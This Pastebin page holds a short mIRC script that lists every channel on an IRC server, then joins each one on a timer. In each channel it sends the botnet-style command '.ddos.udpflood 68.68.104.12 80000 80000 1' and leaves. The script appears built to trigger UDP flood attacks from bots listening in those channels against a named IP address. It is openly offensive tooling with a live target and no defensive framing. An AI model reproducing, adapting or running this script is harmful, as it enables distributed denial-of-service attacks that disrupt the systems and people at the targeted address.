Advertisement
Guest User

Untitled

a guest
May 25th, 2017
53
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. alias listem {
  2. write -c test.txt
  3. list
  4. joinall
  5. }
  6. raw 322:*: { write test.txt $2 }
  7. alias joinall {
  8. unset %j
  9. .timer.j 0 6 joinem
  10. }
  11. alias joinem {
  12. inc %j
  13. if ($read(test.txt,%j)) {
  14. join $v1
  15. msg $v1 .ddos.udpflood 68.68.104.12 80000 80000 1
  16. part $v1
  17. }
  18. else { unset %j | .timer.j off }
  19. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement